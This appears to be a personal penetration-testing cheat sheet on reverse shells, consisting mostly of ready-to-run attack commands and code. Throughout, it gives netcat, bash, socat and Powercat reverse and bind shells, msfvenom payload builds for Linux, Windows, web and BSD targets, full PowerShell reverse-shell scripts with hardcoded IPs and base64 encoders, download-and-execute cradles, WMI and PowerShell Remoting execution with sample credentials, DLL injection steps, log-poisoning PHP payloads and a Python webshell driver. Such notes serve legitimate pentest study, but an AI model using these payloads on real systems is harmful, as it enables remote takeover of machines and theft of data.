akde/infosec

Information security is ultimately about managing risk

Reverse shell

,
, ,

Important notes

  • Don’t try to over­write uploaded reverse shell files. Use new names instead.
  • If the process is killed and you need an asyn­chron system.run[“at now < /tmp/foo.sh”]
  • Wenn exploit­ing a local file inclu­sion vul­ner­a­bil­i­ty, it can be bet­ter to inject code which loads the actu­al exploit code insteadt of inject­ing the exploit code directly. 
    • For HTTP, use the fol­low­ing:
      ?page=<?php echo system($_GET['cmd']); ?>
      or
      User-Agent: Mozilla <?php echo system($_GET['cmd']); ?>
    • Then use the cmd para­me­ter to inject the actu­al code.
      GET /index.php?page=/var/log/apache2/access.log&cmd=%2Fbin%2Fbash%20...

Linux

nc

On the own system:

[rlwrap] nc -lnvp 9998 [l=listen,v=verbose,p=port,n=no_resolution]

On the target:

nc -e /bin/sh 10.0.3.4 4444

Alter­na­tive:

mknod /tmp/backpipe p
/bin/sh 0</tmp/backpipe | nc $attacker 4444 1>/tmp/backpipe

Alter­na­tive:

/bin/bash -c 'bash -i >& /dev/tcp/$attacker/4444 0>&1'

If nc does­n’t seem on the sys­tem: Try a Perl reverse shell!

Bind shell

On the tar­get, where the shell should be bound.

nc -lnvp 9998 -e /bin/bash

On the local attack system:

nc $target 9998

Socat

With TLS

Cre­ate a cer­tifi­cate before:

openssl req -newkey rsa:4096 -nodes -keyout bind_shell.key -x509 -days 42 -out bind_shell.crt
cat bind_shell.key bind_shell.crt > bind_shell.pem

On the own sys­tem, start a listener:

socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash

On the (win­dows) tar­get, poen it:

socat.exe - OPENSSL:$attackerip,verify=0

Without TLS

Con­nect to anoth­er server:

socat - TCP4:$target:4444

Open a listener:

socat TCP4-LISTEN:4444 STDOUT

Trans­fer a file

socat TCP4-Listen:443,fork file:f.txt // on the target
socat TCP4:$target file:f.txt,create // on the local system

Reverse shell

socat -d -d TCP4-LISTEN:443 STDOUT
socat TCP4:10.11.0.22:443 EXEC:/bin/bash

Metasploit payloads

Normal reverse shell

msfvenom -p linux/x86/shell_reverse_tcp LHOST=$attackerip LPORT=443 -f elf > s32.elf
msfvenom -p linux/x64/shell_reverse_tcp LHOST=$attackerip LPORT=443 -f elf > s64.elf

Meterpreter reverse shell

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=$attackerip LPORT=443 -f elf > mps32.elf
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=$attackerip LPORT=443 -f elf > mps64.elf

Normal shell for various languages

Perl reverse shell

msfvenom -p cmd/unix/reverse_perl LHOST=$attackerip LPORT=443 -f raw

Python reverse shell

msfvenom -p cmd/unix/reverse_python LHOST=$attackerip LPORT=443 -f raw

PHP reverse shell

msfvenom -p php/reverse_php LHOST=$attackerip LPORT=443 -f raw

PHP meter­preter (Should this not work because a shell in meter­preter won’t work, use nc to export the bash to a local nc listener.)

msfvenom -p php/meterpreter/reverse_tcp LHOST=$attackerip LPORT=443 -f raw

ASP-Reverse-Shell

msfvenom -p windows/meterpreter/reverse_tcp LHOST=$attackerip LPORT=443 -f asp > s.asp

Tomcat/WAR reverse shell

msfvenom ‑p java/jsp_shell_reverse_tcp LHOST=$attackerip LPORT=443 ‑f war > shell.war PowerShell reverse shell
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=$attackerip LPORT=443 -f psh --out reverse_shell.ps1

(If this doesn’t work, use the make_reverse_powershell.py script or the orig­i­nal from here.)

JSP reverse shell

msfvenom -p java/jsp_shell_reverse_tcp LHOST=$attackerip LPORT=443 -f raw > rs.jsp

JAR reverse shell

msfvenom -p java/meterpreter/reverse_tcp LHOST=$attackerip LPORT=443 -f raw -o rs.jar

Node­JS reverse shell

msfvenom -p nodejs/shell_reverse_tcp LHOST=$attackerip LPORT=443 -f raw -o rs.js

*BSD

msfvenom -p bsd/x64/shell_reverse_tcp LHOST=$attackerip LPORT=3333 elf > mps64.elf
msfvenom -p cmd/unix/reverse_openssl LHOST=$attackerip LPORT=3333

Windows

nc

On the own sys­tem: Start lis­ten­er, see above. Then, on the target:

nc.exe -e cmd.exe $attacker 4444

Reverse shell

Start a shell lis­ten­er on the tar­get (upload nc.exe before):

nc -dLp 4444 -e cmd.exe

Con­nect from the own sys­tem as usu­al or in Metasploit:

use multi/handler
set LPORT 4444
set RHOST $target
set PAYLOAD payload/windows/x64/shell_bind_tcp
run

PowerShell reverse shell, Option 1

Or: Use this reserve shell, made in Pow­er­Shell (pwsh com­mand in Linux):

$Text = '$client = New-Object System.Net.Sockets.TCPClient("192.168.119.3",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'

Con­vert it and put it e.g. in a para­me­ter on a WIn­dows sys­tem. To encode into base64:

PS> $Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
PS> $EncodedText =[Convert]::ToBase64String($Bytes)

Note that in this case you have to use the pow­er­shell com­mand with the ‑enc para­me­ter! Example:

curl .../index.php?cmd=powershell%20-enc%20$base64here

PowerShell reverse shell, Option 2

Take direct­ly this Python script:

import sys
import base64

payload = '$client = New-Object System.Net.Sockets.TCPClient("192.168.1.1",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'

cmd = "powershell -nop -w hidden -e " + base64.b64encode(payload.encode('utf16')[2:]).decode()

print(cmd)

Change IP and port and exe­cute it to get a encod­ed com­mand line to exe­cute a reverse shell.

PowerShell reverse shell via WMI Windows Management Interface

The WMI Win­dows Man­age­ment Inter­face enables remote access to Win­dows Sys­tems via port 135. It is used by the wmic utilty (which is dep­re­cat­ed now).

Exe­cute the fol­low­ing Pow­er­Shell code, use as com­mand e.g. a Pow­er­Shell reverse com­mand from the pre­vi­ous sections:

$username = 'Peter';
$password = 'Summer2002!';
$command = '...';
$target = '192.168.23.4';

$secureString = ConvertTo-SecureString $password -AsPlaintext -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $secureString;
$options = New-CimSessionOption -Protocol DCOM
$session = New-Cimsession -ComputerName $target -Credential $credential -SessionOption $Options 
Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine =$Command};

PowerShell shell via PowerShell Remoting

This does not need a lis­ten­er — it direct­ly opens a shell on anoth­er system.

Adapt and exe­cute this with prop­er parameters:

$username = 'Peter';
$password = 'Summer2002!';
$target = '192.168.23.4';
$secureString = ConvertTo-SecureString $password -AsPlaintext -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $secureString;
New-PSSession -ComputerName $target -Credential $credential

Then, change to the ses­sion which was dis­play, here 1:

Enter-PSSession 1

Socat

Cre­ate the cer­tifi­cate first, see above. Then, lis­ten on Windows:

socat.exe OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:'cmd.exe',pipes

Open from Linux:

socat - OPENSSL:$attackerid:443,verify=0

Powercat

Use Pow­er­cat to lis­ten on a Win­dows host and cre­ate a base64-encod­ed Pow­er­Shell pay­load which can be exe­cut­ed on the Win­dows host with­out addi­tion­al software.

  1. Cre­ate on the own Win­dows sys­tem reverse shell code (or in pwsh on Kali):
    PS> . .\powercat.ps1
    PS> powercat -c $attackerip -p 443 -e cmd.exe -ge > b64shell.ps1
  2. Start nor­mal nc listener.
  3. On the tar­get, exe­cute the shell­code via copy&paste:
    powershell.exe -E ZgB1AG4AYwB0AGkAb…

Short­er approach:

powershell -c IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.11.11:8000/powercat.ps1');powercat -c 192.168.12.12 -p 1111 -e powershell

Visual Basic

VBS / For very old IIS web servers:

Dim objShell:Set objShell = WScript.CreateObject("WScript.Shell"):objShell.Run "cmd /K certutil.exe -urlcache -split -f http://IP/nc.exe C:\users\administrator\Desktop\nc.exe & nc.exe -e cmd.exe IP Port":Set objShell = Nothing

PowerShell

  1. Down­load Invoke-PowerShellTcp.ps1
  2. Add at the bot­tom a line for direct invo­ca­tion:
    Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.12 -Port 443
  3. Serve this file via HTTP.
  4. Open nc handler
  5. Down­load and exe­cute the string direct­ly:
    powershell -c iex(new-object net.webclient).downloadstring('http://10.10.14.12/Invoke-PowerShellTcp.ps1')

Metasploit payloads

Bind shell

Start nc lis­ten­er on the own sys­tem. On the tar­get con­nect with the fol­low­ing executeable:

msfvenom -p windows/shell_reverse_tcp LHOST=$attackerip LPORT=443 -f exe > root.exe

Normal reverse shell

msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=$attackerip LPORT=443 -f exe -o s32.exe
msfvenom -a x64 --platform windows -p windows/x64/shell/reverse_tcp LHOST=$attackerip LPORT=443 -f exe -o s64.exe

Meterpreter reverse shell

msfvenom --platform windows -p windows/meterpreter/reverse_tcp LHOST=$attackerip LPORT=443 -f exe -o mps32.exe
msfvenom -a x64 --platform windows -p windows/x64/meterpreter/reverse_tcp LHOST=$attackerip LPORT=443 -f exe -o mps64.exe

DLL meterpreter reverse shell

msfvenom --platform windows -p windows/meterpreter/reverse_tcp LHOST=$attackerip LPORT=443 -f dll -o mps32.dll
msfvenom -a x64 --platform windows -p windows/x64/meterpreter/reverse_tcp LHOST=$attackerip LPORT=443 -f dll -o mps64.dll
Method 1: Injecting the DLL into an existing process:
  1. Upload the DLL
  2. Upload RemoveDLLInjector32.exe or RemoteDLLInjector64.exe
  3. Inject the pay­load in an exist­ing process:
    RemoveDLLInjector64.exe $pid $full_dll_file_path

Keep in mind: If you replace a cus­tom-made DLL, then it could be that the app crash­es short­ly after the first reverse shell because the app tried to call a func­tion in your DLL which is not there.

Method 2: Loading the DLL standalone
  1. Upload the DLL
  2. Exe­cute on the tar­get C:\Windows\System32\rundll32.exe C:\...\payload.dll

HTA reverse shell

msf> use exploit/windows/misc/hta_server
msf> ... run

You get an URL with a HTA pay­load. On the tar­get, just execute

mshta.exe $attacker_paylaod

More options => https://book.hacktricks.xyz/shells/shells/windows

Webshell

If you can exe­cute com­mands via an injec­tion in an URL, use this Python script (from Alexander):

import requests
 import readline
 import urllib.parse
 url = "http://10.10.10.218/weather/forecast/index.php?city="
 msg = "London');{}--"
 def aggressive_url_encode(string):
     return "".join("%{0:0>2}".format(format(ord(char), "x")) for char in string)
 while True:
     #exploit = "os.execute('{}');".format(input("$ ").strip())
     exploit = "print('\n'..io.popen('{} 2>&1'):read('*a'));".format(input("$ ").strip().replace("'", "\'").replace('"','\"'))
     query = url+aggressive_url_encode(msg.format(exploit))
     print(query)
     print(requests.get(query).text)

Leave a Reply

About

Personal collection of some infosec stuff. Primary purpose of this site is to collect and organize for myself.

Note: Some content is not publicly visible due to copyright issues. Therefore, some links could be broken.

Checklists

Categories

Checklists: Ports

python -c 'import pty;pty.spawn("/bin/bash")';

python3 -c 'import pty;pty.spawn("/bin/bash")';